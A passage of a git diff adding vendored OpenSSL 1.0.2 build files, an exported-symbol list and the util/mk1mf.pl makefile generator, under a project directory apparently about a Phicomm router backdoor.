+OCSP_REQ_CTX_new                        4717	EXIST::FUNCTION:
+OCSP_REQ_CTX_nbio_d2i                   4718	EXIST::FUNCTION:
+EVP_aes_256_wrap                        4719	EXIST::FUNCTION:AES
+CRYPTO_128_wrap                         4720	EXIST::FUNCTION:
+RSA_OAEP_PARAMS_new                     4721	EXIST::FUNCTION:RSA
+CRYPTO_128_unwrap                       4722	EXIST::FUNCTION:
+ECDSA_METHOD_set_name                   4723	EXIST::FUNCTION:ECDSA
+CMS_RecipientInfo_kari_decrypt          4724	EXIST::FUNCTION:CMS
+CMS_SignerInfo_get0_pkey_ctx            4725	EXIST::FUNCTION:CMS
+ECDSA_METHOD_set_flags                  4726	EXIST::FUNCTION:ECDSA
+ECDSA_METHOD_set_sign_setup             4727	EXIST::FUNCTION:ECDSA
+CMS_RecipientInfo_kari_orig_id_cmp      4728	EXIST:!VMS:FUNCTION:CMS
+CMS_RecipInfo_kari_orig_id_cmp          4728	EXIST:VMS:FUNCTION:CMS
+CMS_RecipientInfo_kari_get0_alg         4729	EXIST::FUNCTION:CMS
+EVP_aes_192_wrap                        4730	EXIST::FUNCTION:AES
+EVP_aes_128_cbc_hmac_sha256             4731	EXIST::FUNCTION:AES,SHA256
+DH_compute_key_padded                   4732	EXIST::FUNCTION:DH
+ECDSA_METHOD_set_sign                   4733	EXIST::FUNCTION:ECDSA
+CMS_RecipientEncryptedKey_cert_cmp      4734	EXIST:!VMS:FUNCTION:CMS
+CMS_RecipEncryptedKey_cert_cmp          4734	EXIST:VMS:FUNCTION:CMS
+DH_KDF_X9_42                            4735	EXIST::FUNCTION:DH
+RSA_OAEP_PARAMS_free                    4736	EXIST::FUNCTION:RSA
+EVP_des_ede3_wrap                       4737	EXIST::FUNCTION:DES
+RSA_OAEP_PARAMS_it                      4738	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RSA
+RSA_OAEP_PARAMS_it                      4738	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RSA
+ASN1_TIME_diff                          4739	EXIST::FUNCTION:
+EVP_aes_256_cbc_hmac_sha256             4740	EXIST::FUNCTION:AES,SHA256
+CMS_SignerInfo_get0_signature           4741	EXIST::FUNCTION:CMS
+CMS_RecipientInfo_kari_get0_reks        4742	EXIST:!VMS:FUNCTION:CMS
+CMS_RecipInfo_kari_get0_reks            4742	EXIST:VMS:FUNCTION:CMS
+EVP_aes_128_wrap                        4743	EXIST::FUNCTION:AES
+CMS_SignerInfo_get0_md_ctx              4744	EXIST::FUNCTION:CMS
+OPENSSL_gmtime_diff                     4745	EXIST::FUNCTION:
+CMS_RecipientInfo_kari_set0_pkey        4746	EXIST:!VMS:FUNCTION:CMS
+CMS_RecipInfo_kari_set0_pkey            4746	EXIST:VMS:FUNCTION:CMS
+i2d_RSA_OAEP_PARAMS                     4747	EXIST::FUNCTION:RSA
+d2i_RSA_OAEP_PARAMS                     4748	EXIST::FUNCTION:RSA
+ECDH_KDF_X9_62                          4749	EXIST::FUNCTION:ECDH
+CMS_RecipientInfo_kari_get0_ctx         4750	EXIST::FUNCTION:CMS
+ECDSA_METHOD_new                        4751	EXIST::FUNCTION:ECDSA
+CMS_RecipientInfo_get0_pkey_ctx         4752	EXIST::FUNCTION:CMS
+CMS_RecipientEncryptedKey_get0_id       4753	EXIST:!VMS:FUNCTION:CMS
+CMS_RecipEncryptedKey_get0_id           4753	EXIST:VMS:FUNCTION:CMS
+RSA_padding_check_PKCS1_OAEP_mgf1       4754	EXIST:!VMS:FUNCTION:RSA
+RSA_pad_check_PKCS1_OAEP_mgf1           4754	EXIST:VMS:FUNCTION:RSA
+ECDSA_METHOD_set_verify                 4755	EXIST::FUNCTION:ECDSA
+CMS_SharedInfo_encode                   4756	EXIST::FUNCTION:CMS
+RSA_padding_add_PKCS1_OAEP_mgf1         4757	EXIST::FUNCTION:RSA
+CMS_RecipientInfo_kari_get0_orig_id     4758	EXIST:!VMS:FUNCTION:CMS
+CMS_RecipInfo_kari_get0_orig_id         4758	EXIST:VMS:FUNCTION:CMS
+ECDSA_METHOD_free                       4759	EXIST::FUNCTION:ECDSA
+X509_VERIFY_PARAM_get_count             4760	EXIST::FUNCTION:
+X509_VERIFY_PARAM_get0_name             4761	EXIST::FUNCTION:
+X509_VERIFY_PARAM_get0                  4762	EXIST::FUNCTION:
+X509V3_EXT_free                         4763	EXIST::FUNCTION:
+BIO_hex_string                          4764	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set_hostflags         4765	EXIST::FUNCTION:
+BUF_strnlen                             4766	EXIST::FUNCTION:
+X509_VERIFY_PARAM_get0_peername         4767	EXIST::FUNCTION:
+ECDSA_METHOD_set_app_data               4768	EXIST::FUNCTION:ECDSA
+sk_deep_copy                            4769	EXIST::FUNCTION:
+ECDSA_METHOD_get_app_data               4770	EXIST::FUNCTION:ECDSA
+X509_VERIFY_PARAM_add1_host             4771	EXIST::FUNCTION:
+EC_GROUP_get_mont_data                  4772	EXIST::FUNCTION:EC
+i2d_re_X509_tbs                         4773	EXIST::FUNCTION:
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mk1mf.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mk1mf.pl
new file mode 100755
index 0000000..9741240
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mk1mf.pl
@@ -0,0 +1,1319 @@
+#!/usr/local/bin/perl
+# A bit of an evil hack but it post processes the file ../MINFO which
+# is generated by `make files` in the top directory.
+# This script outputs one mega makefile that has no shell stuff or any
+# funny stuff (if the target is not "copy").
+# If the target is "copy", then it tries to create a makefile that can be
+# safely used with the -j flag and that is compatible with the top-level
+# Makefile, in the sense that it uses the same options and assembler files etc.
+
+use Cwd;
+
+$INSTALLTOP="/usr/local/ssl";
+$OPENSSLDIR="/usr/local/ssl";
+$OPTIONS="";
+$ssl_version="";
+$banner="\t\@echo Building OpenSSL";
+
+my $no_static_engine = 1;
+my $engines = "";
+my $otherlibs = "";
+local $zlib_opt = 0;	# 0 = no zlib, 1 = static, 2 = dynamic
+local $zlib_lib = "";
+local $perl_asm = 0;	# 1 to autobuild asm files from perl scripts
+
+my $ex_l_libs = "";
+
+# Options to import from top level Makefile
+
+my %mf_import = (
+	VERSION	       => \$ssl_version,
+	OPTIONS        => \$OPTIONS,
+	INSTALLTOP     => \$INSTALLTOP,
+	OPENSSLDIR     => \$OPENSSLDIR,
+	PLATFORM       => \$mf_platform,
+	CC             => \$mf_cc,
+	CFLAG	       => \$mf_cflag,
+	DEPFLAG	       => \$mf_depflag,
+	CPUID_OBJ      => \$mf_cpuid_asm,
+	BN_ASM	       => \$mf_bn_asm,
+	DES_ENC	       => \$mf_des_asm,
+	AES_ENC        => \$mf_aes_asm,
+	BF_ENC	       => \$mf_bf_asm,
+	CAST_ENC       => \$mf_cast_asm,
+	RC4_ENC	       => \$mf_rc4_asm,
+	RC5_ENC        => \$mf_rc5_asm,
+	MD5_ASM_OBJ    => \$mf_md5_asm,
+	SHA1_ASM_OBJ   => \$mf_sha_asm,
+	RMD160_ASM_OBJ => \$mf_rmd_asm,
+	WP_ASM_OBJ     => \$mf_wp_asm,
+	CMLL_ENC       => \$mf_cm_asm,
+	MODES_ASM_OBJ  => \$mf_modes_asm,
+        ENGINES_ASM_OBJ=> \$mf_engines_asm,
+	BASEADDR       => \$baseaddr,
+	FIPSDIR        => \$fipsdir,
+	EC_ASM	       => \$mf_ec_asm,
+);
+
+open(IN,"<Makefile") || die "unable to open Makefile!\n";
+while(<IN>) {
+    my ($mf_opt, $mf_ref);
+    while (($mf_opt, $mf_ref) = each %mf_import) {
+    	if (/^$mf_opt\s*=\s*(.*)$/ && !defined($$mfref)) {
+	   $$mf_ref = $1;
+	}
+    }
+}
+close(IN);
+
+$debug = 1 if $mf_platform =~ /^debug-/;
+
+die "Makefile is not the toplevel Makefile!\n" if $ssl_version eq "";
+
+$infile="MINFO";
+
+%ops=(
+	"VC-WIN32",   "Microsoft Visual C++ [4-6] - Windows NT or 9X",
+	"VC-WIN64I",  "Microsoft C/C++ - Win64/IA-64",
+	"VC-WIN64A",  "Microsoft C/C++ - Win64/x64",
+	"VC-CE",   "Microsoft eMbedded Visual C++ 3.0 - Windows CE ONLY",
+	"VC-NT",   "Microsoft Visual C++ [4-6] - Windows NT ONLY",
+	"Mingw32", "GNU C++ - Windows NT or 9x",
+	"Mingw32-files", "Create files with DOS copy ...",
+	"BC-NT",   "Borland C++ 4.5 - Windows NT",
+	"linux-elf","Linux elf",
+	"ultrix-mips","DEC mips ultrix",
+	"FreeBSD","FreeBSD distribution",
+	"OS2-EMX", "EMX GCC OS/2",
+	"netware-clib", "CodeWarrior for NetWare - CLib - with WinSock Sockets",
+	"netware-clib-bsdsock", "CodeWarrior for NetWare - CLib - with BSD Sockets",
+	"netware-libc", "CodeWarrior for NetWare - LibC - with WinSock Sockets",
+	"netware-libc-bsdsock", "CodeWarrior for NetWare - LibC - with BSD Sockets",
+	"default","cc under unix",
+	"auto", "auto detect from top level Makefile",
+        "copy", "copy from top level Makefile"
+	);
+
+$platform="";
+my $xcflags="";
+foreach (@ARGV)
+	{
+	if (!&read_options && !defined($ops{$_}))
+		{
+		print STDERR "unknown option - $_\n";
+		print STDERR "usage: perl mk1mf.pl [options] [system]\n";
+		print STDERR "\nwhere [system] can be one of the following\n";
+		foreach $i (sort keys %ops)
+		{ printf STDERR "\t%-10s\t%s\n",$i,$ops{$i}; }
+		print STDERR <<"EOF";
+and [options] can be one of
+	no-md2 no-md4 no-md5 no-sha no-mdc2	- Skip this digest
+	no-ripemd
+	no-rc2 no-rc4 no-rc5 no-idea no-des     - Skip this symetric cipher
+	no-bf no-cast no-aes no-camellia no-seed
+	no-rsa no-dsa no-dh			- Skip this public key cipher
+	no-ssl2 no-ssl3				- Skip this version of SSL
+	just-ssl				- remove all non-ssl keys/digest
+	no-asm 					- No x86 asm
+	no-krb5					- No KRB5
+	no-srp					- No SRP
+	no-ec					- No EC
+	no-ecdsa				- No ECDSA
+	no-ecdh					- No ECDH
+	no-engine				- No engine
+	no-hw					- No hw
+	nasm 					- Use NASM for x86 asm
+	nw-nasm					- Use NASM x86 asm for NetWare
+	nw-mwasm				- Use Metrowerks x86 asm for NetWare
+	gaswin					- Use GNU as with Mingw32
+	no-socks				- No socket code
+	no-err					- No error strings
+	dll/shlib				- Build shared libraries (MS)
+	debug					- Debug build
+        profile                                 - Profiling build
+	gcc					- Use Gcc (unix)
+
+Values that can be set
+TMP=tmpdir OUT=outdir SRC=srcdir BIN=binpath INC=header-outdir CC=C-compiler
+
+-L<ex_lib_path> -l<ex_lib>			- extra library flags (unix)
+-<ex_cc_flags>					- extra 'cc' flags,
+						  added (MS), or replace (unix)
+EOF
+		exit(1);
+		}
+	$platform=$_;
+	}
+foreach (grep(!/^$/, split(/ /, $OPTIONS)))
+	{
+	print STDERR "unknown option - $_\n" if !&read_options;
+	}
+
+$no_static_engine = 0 if (!$shlib);
+
+$no_mdc2=1 if ($no_des);
+
+$no_ssl3=1 if ($no_md5 || $no_sha);
+$no_ssl3=1 if ($no_rsa && $no_dh);
+
+$no_ssl2=1 if ($no_md5);
+$no_ssl2=1 if ($no_rsa);
+
+$out_def="out";
+$inc_def="outinc";
+$tmp_def="tmp";
+
+$perl="perl" unless defined $perl;
+$mkdir="-mkdir" unless defined $mkdir;
+
+($ssl,$crypto)=("ssl","crypto");
+$ranlib="echo ranlib";
+
+$cc=(defined($VARS{'CC'}))?$VARS{'CC'}:'cc';
+$src_dir=(defined($VARS{'SRC'}))?$VARS{'SRC'}: $platform eq 'copy' ? getcwd() : '.';
+$bin_dir=(defined($VARS{'BIN'}))?$VARS{'BIN'}:'';
+
+# $bin_dir.=$o causes a core dump on my sparc :-(
+
+
+$NT=0;
+
+push(@INC,"util/pl","pl");
+
+if ($platform eq "auto" || $platform eq 'copy') {
+	$orig_platform = $platform;
+	$platform = $mf_platform;
+	print STDERR "Imported platform $mf_platform\n";
+}
+
+if (($platform =~ /VC-(.+)/))
+	{
+	$FLAVOR=$1;
+	$NT = 1 if $1 eq "NT";
+	require 'VC-32.pl';
+	}
+elsif ($platform eq "Mingw32")
+	{
+	require 'Mingw32.pl';
+	}
+elsif ($platform eq "Mingw32-files")
+	{
+	require 'Mingw32f.pl';
+	}
+elsif ($platform eq "BC-NT")
+	{
+	$bc=1;
+	require 'BC-32.pl';
+	}
+elsif ($platform eq "FreeBSD")
+	{
+	require 'unix.pl';
+	$cflags='-DTERMIOS -D_ANSI_SOURCE -O2 -fomit-frame-pointer';
+	}
+elsif ($platform eq "linux-elf")
+	{
+	require "unix.pl";
+	require "linux.pl";
+	$unix=1;
+	}
+elsif ($platform eq "ultrix-mips")
+	{
+	require "unix.pl";
+	require "ultrix.pl";
+	$unix=1;
+	}
+elsif ($platform eq "OS2-EMX")
+	{
+	$wc=1;
+	require 'OS2-EMX.pl';
+	}
+elsif (($platform eq "netware-clib") || ($platform eq "netware-libc") ||
+       ($platform eq "netware-clib-bsdsock") || ($platform eq "netware-libc-bsdsock"))
+	{
+	$LIBC=1 if $platform eq "netware-libc" || $platform eq "netware-libc-bsdsock";
+	$BSDSOCK=1 if ($platform eq "netware-libc-bsdsock") || ($platform eq "netware-clib-bsdsock");
+	require 'netware.pl';
+	}
+else
+	{
+	require "unix.pl";
+
+	$unix=1;
+	$cflags.=' -DTERMIOS';
+	}
+
+$fipsdir =~ s/\//${o}/g;
+
+$out_dir=(defined($VARS{'OUT'}))?$VARS{'OUT'}:$out_def.($debug?".dbg":"");
+$tmp_dir=(defined($VARS{'TMP'}))?$VARS{'TMP'}:$tmp_def.($debug?".dbg":"");
+$inc_dir=(defined($VARS{'INC'}))?$VARS{'INC'}:$inc_def;
+
+$bin_dir=$bin_dir.$o unless ((substr($bin_dir,-1,1) eq $o) || ($bin_dir eq ''));
+
+$cflags= "$xcflags$cflags" if $xcflags ne "";
+
+$cflags.=" -DOPENSSL_NO_IDEA" if $no_idea;
+$cflags.=" -DOPENSSL_NO_AES"  if $no_aes;
+$cflags.=" -DOPENSSL_NO_CAMELLIA"  if $no_camellia;
+$cflags.=" -DOPENSSL_NO_SEED" if $no_seed;
+$cflags.=" -DOPENSSL_NO_RC2"  if $no_rc2;
+$cflags.=" -DOPENSSL_NO_RC4"  if $no_rc4;
+$cflags.=" -DOPENSSL_NO_RC5"  if $no_rc5;
+$cflags.=" -DOPENSSL_NO_MD2"  if $no_md2;
+$cflags.=" -DOPENSSL_NO_MD4"  if $no_md4;
+$cflags.=" -DOPENSSL_NO_MD5"  if $no_md5;
+$cflags.=" -DOPENSSL_NO_SHA"  if $no_sha;
+$cflags.=" -DOPENSSL_NO_SHA1" if $no_sha1;
+$cflags.=" -DOPENSSL_NO_RIPEMD" if $no_ripemd;
+$cflags.=" -DOPENSSL_NO_MDC2" if $no_mdc2;
+$cflags.=" -DOPENSSL_NO_BF"  if $no_bf;
+$cflags.=" -DOPENSSL_NO_CAST" if $no_cast;
+$cflags.=" -DOPENSSL_NO_DES"  if $no_des;
+$cflags.=" -DOPENSSL_NO_RSA"  if $no_rsa;
+$cflags.=" -DOPENSSL_NO_DSA"  if $no_dsa;
+$cflags.=" -DOPENSSL_NO_DH"   if $no_dh;
+$cflags.=" -DOPENSSL_NO_WHIRLPOOL"   if $no_whirlpool;
+$cflags.=" -DOPENSSL_NO_SOCK" if $no_sock;
+$cflags.=" -DOPENSSL_NO_SSL2" if $no_ssl2;
+$cflags.=" -DOPENSSL_NO_SSL3" if $no_ssl3;
+$cflags.=" -DOPENSSL_NO_TLSEXT" if $no_tlsext;
+$cflags.=" -DOPENSSL_NO_SRP" if $no_srp;
+$cflags.=" -DOPENSSL_NO_CMS" if $no_cms;
+$cflags.=" -DOPENSSL_NO_ERR"  if $no_err;
+$cflags.=" -DOPENSSL_NO_KRB5" if $no_krb5;
+$cflags.=" -DOPENSSL_NO_EC"   if $no_ec;
+$cflags.=" -DOPENSSL_NO_ECDSA" if $no_ecdsa;
+$cflags.=" -DOPENSSL_NO_ECDH" if $no_ecdh;
+$cflags.=" -DOPENSSL_NO_GOST" if $no_gost;
+$cflags.=" -DOPENSSL_NO_ENGINE"   if $no_engine;
+$cflags.=" -DOPENSSL_NO_HW"   if $no_hw;
+$cflags.=" -DOPENSSL_FIPS"    if $fips;
+$cflags.=" -DOPENSSL_NO_JPAKE"    if $no_jpake;
+$cflags.=" -DOPENSSL_NO_EC2M"    if $no_ec2m;
+$cflags.= " -DZLIB" if $zlib_opt;
+$cflags.= " -DZLIB_SHARED" if $zlib_opt == 2;
+
+if ($no_static_engine)
+	{
+	$cflags .= " -DOPENSSL_NO_STATIC_ENGINE";
+	}
+else
+	{
+	$cflags .= " -DOPENSSL_NO_DYNAMIC_ENGINE";
+	}
+
+#$cflags.=" -DRSAref"  if $rsaref ne "";
+
+## if ($unix)
+##	{ $cflags="$c_flags" if ($c_flags ne ""); }
+##else
+	{ $cflags="$c_flags$cflags" if ($c_flags ne ""); }
+
+if ($orig_platform eq 'copy') {
+    $cflags = $mf_cflag;
+    $cc = $mf_cc;
+}
+
+$ex_libs="$l_flags$ex_libs" if ($l_flags ne "");
+
+
+%shlib_ex_cflags=("SSL" => " -DOPENSSL_BUILD_SHLIBSSL",
+		  "CRYPTO" => " -DOPENSSL_BUILD_SHLIBCRYPTO");
+
+if ($msdos)
+	{
+	$banner ="\t\@echo Make sure you have run 'perl Configure $platform' in the\n";
+	$banner.="\t\@echo top level directory, if you don't have perl, you will\n";
+	$banner.="\t\@echo need to probably edit crypto/bn/bn.h, check the\n";
+	$banner.="\t\@echo documentation for details.\n";
+	}
+
+# have to do this to allow $(CC) under unix
+$link="$bin_dir$link" if ($link !~ /^\$/);
+
+$INSTALLTOP =~ s|/|$o|g;
+$OPENSSLDIR =~ s|/|$o|g;
+
+#############################################
+# We parse in input file and 'store' info for later printing.
+open(IN,"<$infile") || die "unable to open $infile:$!\n";
+$_=<IN>;
+for (;;)
+	{
+	chop;
+
+	($key,$val)=/^([^=]+)=(.*)/;
+	if ($key eq "RELATIVE_DIRECTORY")
+		{
+		if ($lib ne "")
+			{
+			$uc=$lib;
+			$uc =~ s/^lib(.*)\.a/$1/;
+			$uc =~ tr/a-z/A-Z/;
+			$lib_nam{$uc}=$uc;
+			$lib_obj{$uc}.=$libobj." ";
+			}
+		last if ($val eq "FINISHED");
+		$lib="";
+		$libobj="";
+		$dir=$val;
+		}
+
+	if ($key eq "KRB5_INCLUDES")
+		{ $cflags .= " $val";}
+
+	if ($key eq "ZLIB_INCLUDE")
+		{ $cflags .= " $val" if $val ne "";}
+
+	if ($key eq "LIBZLIB")
+		{ $zlib_lib = "$val" if $val ne "";}
+
+	if ($key eq "LIBKRB5")
+		{ $ex_libs .= " $val" if $val ne "";}
+
+	if ($key eq "TEST")
+		{ $test.=&var_add($dir,$val, 0); }
+
+	if (($key eq "PROGS") || ($key eq "E_OBJ"))
+		{ $e_exe.=&var_add($dir,$val, 0); }
+
+	if ($key eq "LIB")
+		{
+		$lib=$val;
+		$lib =~ s/^.*\/([^\/]+)$/$1/;
+		}
+	if ($key eq "LIBNAME" && $no_static_engine)
+		{
+		$lib=$val;
+		$lib =~ s/^.*\/([^\/]+)$/$1/;
+		$otherlibs .= " $lib";
+		}
+
+	if ($key eq "EXHEADER")
+		{ $exheader.=&var_add($dir,$val, 1); }
+
+	if ($key eq "HEADER")
+		{ $header.=&var_add($dir,$val, 1); }
+
+	if ($key eq "LIBOBJ" && ($dir ne "engines" || !$no_static_engine))
+		{ $libobj=&var_add($dir,$val, 0); }
+	if ($key eq "LIBNAMES" && $dir eq "engines" && $no_static_engine)
+ 		{ $engines.=$val }
+
+	if (!($_=<IN>))
+		{ $_="RELATIVE_DIRECTORY=FINISHED\n"; }
+	}
+close(IN);
+
+if ($orig_platform eq 'copy')
+	{
+	# Remove opensslconf.h so it doesn't get updated if we configure a
+	# different branch.
+	$exheader =~ s/[^ ]+\/opensslconf.h//;
+	$header =~ s/[^ ]+\/opensslconf.h//;
+	}
+
+if ($shlib)
+	{
+	$extra_install= <<"EOF";
+	\$(CP) \"\$(O_SSL)\" \"\$(INSTALLTOP)${o}bin\"
+	\$(CP) \"\$(O_CRYPTO)\" \"\$(INSTALLTOP)${o}bin\"
+	\$(CP) \"\$(L_SSL)\" \"\$(INSTALLTOP)${o}lib\"
+	\$(CP) \"\$(L_CRYPTO)\" \"\$(INSTALLTOP)${o}lib\"
+EOF
+	if ($no_static_engine)
+		{
+		$extra_install .= <<"EOF"
+	\$(MKDIR) \"\$(INSTALLTOP)${o}lib${o}engines\"
+	\$(CP) \"\$(E_SHLIB)\" \"\$(INSTALLTOP)${o}lib${o}engines\"
+EOF
+		}
+	}
+else
+	{
+	$extra_install= <<"EOF";
+	\$(CP) \"\$(O_SSL)\" \"\$(INSTALLTOP)${o}lib\"
+	\$(CP) \"\$(O_CRYPTO)\" \"\$(INSTALLTOP)${o}lib\"
+EOF
+	$ex_libs .= " $zlib_lib" if $zlib_opt == 1;
+	if ($fips)
+		{
+		$build_targets .= " \$(LIB_D)$o$crypto_compat \$(PREMAIN_DSO_EXE)";
+		$ex_l_libs .= " \$(O_FIPSCANISTER)";
+		}
+	}
+
+$defs= <<"EOF";
+# N.B. You MUST use -j on FreeBSD.
+# This makefile has been automatically generated from the OpenSSL distribution.
+# This single makefile will build the complete OpenSSL distribution and
+# by default leave the 'intertesting' output files in .${o}out and the stuff
+# that needs deleting in .${o}tmp.
+# The file was generated by running 'make makefile.one', which
+# does a 'make files', which writes all the environment variables from all
+# the makefiles to the file call MINFO.  This file is used by
+# util${o}mk1mf.pl to generate makefile.one.
+# The 'makefile per directory' system suites me when developing this
+# library and also so I can 'distribute' indervidual library sections.
+# The one monster makefile better suits building in non-unix
+# environments.
+
+EOF
+
+$defs .= $preamble if defined $preamble;
+
+$defs.= <<"EOF";
+INSTALLTOP=$INSTALLTOP
+OPENSSLDIR=$OPENSSLDIR
+
+# Set your compiler options
+PLATFORM=$platform
+CC=$bin_dir${cc}
+CFLAG=$cflags
+APP_CFLAG=$app_cflag
+LIB_CFLAG=$lib_cflag
+SHLIB_CFLAG=$shl_cflag
+APP_EX_OBJ=$app_ex_obj
+SHLIB_EX_OBJ=$shlib_ex_obj
+# add extra libraries to this define, for solaris -lsocket -lnsl would
+# be added
+EX_LIBS=$ex_libs
+
+# The OpenSSL directory
+SRC_D=$src_dir
+
+LINK=$link
+LFLAGS=$lflags
+RSC=$rsc
+
+# The output directory for everything interesting
+OUT_D=$out_dir
+# The output directory for all the temporary muck
+TMP_D=$tmp_dir
+# The output directory for the header files
+INC_D=$inc_dir
+INCO_D=$inc_dir${o}openssl
+
+PERL=$perl
+CP=$cp
+RM=$rm
+RANLIB=$ranlib
+MKDIR=$mkdir
+MKLIB=$bin_dir$mklib
+MLFLAGS=$mlflags
+ASM=$bin_dir$asm
+
+# FIPS validated module and support file locations
+
+E_PREMAIN_DSO=fips_premain_dso
+
+FIPSDIR=$fipsdir
+BASEADDR=$baseaddr
+FIPSLIB_D=\$(FIPSDIR)${o}lib
+FIPS_PREMAIN_SRC=\$(FIPSLIB_D)${o}fips_premain.c
+O_FIPSCANISTER=\$(FIPSLIB_D)${o}fipscanister.lib
+FIPS_SHA1_EXE=\$(FIPSDIR)${o}bin${o}fips_standalone_sha1${exep}
+PREMAIN_DSO_EXE=\$(BIN_D)${o}fips_premain_dso$exep
+FIPSLINK=\$(PERL) \$(FIPSDIR)${o}bin${o}fipslink.pl
+
+######################################################
+# You should not need to touch anything below this point
+######################################################
+
+E_EXE=openssl
+SSL=$ssl
+CRYPTO=$crypto
+
+# BIN_D  - Binary output directory
+# TEST_D - Binary test file output directory
+# LIB_D  - library output directory
+# ENG_D  - dynamic engine output directory
+# Note: if you change these point to different directories then uncomment out
+# the lines around the 'NB' comment below.
+# 
+BIN_D=\$(OUT_D)
+TEST_D=\$(OUT_D)
+LIB_D=\$(OUT_D)
+ENG_D=\$(OUT_D)
+
+# INCL_D - local library directory
+# OBJ_D  - temp object file directory
+OBJ_D=\$(TMP_D)
+INCL_D=\$(TMP_D)
+
+O_SSL=     \$(LIB_D)$o$plib\$(SSL)$shlibp
+O_CRYPTO=  \$(LIB_D)$o$plib\$(CRYPTO)$shlibp
+SO_SSL=    $plib\$(SSL)$so_shlibp
+SO_CRYPTO= $plib\$(CRYPTO)$so_shlibp
+L_SSL=     \$(LIB_D)$o$plib\$(SSL)$libp
+L_CRYPTO=  \$(LIB_D)$o$plib\$(CRYPTO)$libp
+
+L_LIBS= \$(L_SSL) \$(L_CRYPTO) $ex_l_libs
+
+######################################################
+# Don't touch anything below this point
+######################################################
+
+INC=-I\$(INC_D) -I\$(INCL_D)
+APP_CFLAGS=\$(INC) \$(CFLAG) \$(APP_CFLAG)
+LIB_CFLAGS=\$(INC) \$(CFLAG) \$(LIB_CFLAG)
+SHLIB_CFLAGS=\$(INC) \$(CFLAG) \$(LIB_CFLAG) \$(SHLIB_CFLAG)
+LIBS_DEP=\$(O_CRYPTO) \$(O_SSL)
+
+#############################################
+EOF
+
+$rules=<<"EOF";
+all: banner \$(TMP_D) \$(BIN_D) \$(TEST_D) \$(LIB_D) \$(INCO_D) headers lib exe $build_targets
+
+banner:
+$banner
+
+\$(TMP_D):
+	\$(MKDIR) \"\$(TMP_D)\"
+# NB: uncomment out these lines if BIN_D, TEST_D and LIB_D are different
+#\$(BIN_D):
+#	\$(MKDIR) \$(BIN_D)
+#
+#\$(TEST_D):
+#	\$(MKDIR) \$(TEST_D)
+
+\$(LIB_D):
+	\$(MKDIR) \"\$(LIB_D)\"
+
+\$(INCO_D): \$(INC_D)
+	\$(MKDIR) \"\$(INCO_D)\"
+
+\$(INC_D):
+	\$(MKDIR) \"\$(INC_D)\"
+
+# This needs to be invoked once, when the makefile is first constructed, or
+# after cleaning.
+init: \$(TMP_D) \$(LIB_D) \$(INC_D) \$(INCO_D) \$(BIN_D) \$(TEST_D) headers
+	\$(PERL) \$(SRC_D)/util/copy-if-different.pl "\$(SRC_D)/crypto/opensslconf.h" "\$(INCO_D)/opensslconf.h"
+
+headers: \$(HEADER) \$(EXHEADER)
+
+lib: \$(LIBS_DEP) \$(E_SHLIB)
+
+exe: \$(T_EXE) \$(BIN_D)$o\$(E_EXE)$exep
+
+install: all
+	\$(MKDIR) \"\$(INSTALLTOP)\"
+	\$(MKDIR) \"\$(INSTALLTOP)${o}bin\"
+	\$(MKDIR) \"\$(INSTALLTOP)${o}include\"
+	\$(MKDIR) \"\$(INSTALLTOP)${o}include${o}openssl\"
+	\$(MKDIR) \"\$(INSTALLTOP)${o}lib\"
+	\$(CP) \"\$(INCO_D)${o}*.\[ch\]\" \"\$(INSTALLTOP)${o}include${o}openssl\"
+	\$(CP) \"\$(BIN_D)$o\$(E_EXE)$exep \$(INSTALLTOP)${o}bin\"
+	\$(MKDIR) \"\$(OPENSSLDIR)\"
+	\$(CP) apps${o}openssl.cnf \"\$(OPENSSLDIR)\"
+$extra_install
+
+clean:
+	\$(RM) \$(TMP_D)$o*.*
+
+vclean:
+	\$(RM) \$(TMP_D)$o*.*
+	\$(RM) \$(OUT_D)$o*.*
+
+reallyclean:
+	\$(RM) -rf \$(TMP_D)
+	\$(RM) -rf \$(BIN_D)
+	\$(RM) -rf \$(TEST_D)
+	\$(RM) -rf \$(LIB_D)
+	\$(RM) -rf \$(INC_D)
+
+EOF
+
+if ($orig_platform ne 'copy')
+	{
+        $rules .= <<"EOF";
+test: \$(T_EXE)
+	cd \$(BIN_D)
+	..${o}ms${o}test
+
+EOF
+	}
+
+my $platform_cpp_symbol = "MK1MF_PLATFORM_$platform";
+$platform_cpp_symbol =~ s/-/_/g;
+if (open(IN,"crypto/buildinf.h"))
+	{
+	# Remove entry for this platform in existing file buildinf.h.
+
+	my $old_buildinf_h = "";
+	while (<IN>)
+		{
+		if (/^\#ifdef $platform_cpp_symbol$/)
+			{
+			while (<IN>) { last if (/^\#endif/); }
+			}
+		else
+			{
+			$old_buildinf_h .= $_;
+			}
+		}
+	close(IN);
+
+	open(OUT,">crypto/buildinf.h") || die "Can't open buildinf.h";
+	print OUT $old_buildinf_h;
+	close(OUT);
+	}
+
+open (OUT,">>crypto/buildinf.h") || die "Can't open buildinf.h";
+printf OUT <<EOF;
+#ifdef $platform_cpp_symbol
+  /* auto-generated/updated by util/mk1mf.pl for crypto/cversion.c */
+  #define CFLAGS "compiler: $cc $cflags"
+  #define PLATFORM "$platform"
+EOF
+printf OUT "  #define DATE \"%s\"\n", scalar gmtime();
+printf OUT "#endif\n";
+close(OUT);
+
+# Strip off trailing ' '
+foreach (keys %lib_obj) { $lib_obj{$_}=&clean_up_ws($lib_obj{$_}); }
+$test=&clean_up_ws($test);
+$e_exe=&clean_up_ws($e_exe);
+$exheader=&clean_up_ws($exheader);
+$header=&clean_up_ws($header);
+
+# First we strip the exheaders from the headers list
+foreach (split(/\s+/,$exheader)){ $h{$_}=1; }
+foreach (split(/\s+/,$header))	{ $h.=$_." " unless $h{$_}; }
+chop($h); $header=$h;
+
+$defs.=&do_defs("HEADER",$header,"\$(INCL_D)","");
+$rules.=&do_copy_rule("\$(INCL_D)",$header,"");
+
+$defs.=&do_defs("EXHEADER",$exheader,"\$(INCO_D)","");
+$rules.=&do_copy_rule("\$(INCO_D)",$exheader,"");
+
+$defs.=&do_defs("T_OBJ",$test,"\$(OBJ_D)",$obj);
+$rules.=&do_compile_rule("\$(OBJ_D)",$test,"\$(APP_CFLAGS)");
+
+$defs.=&do_defs("E_OBJ",$e_exe,"\$(OBJ_D)",$obj);
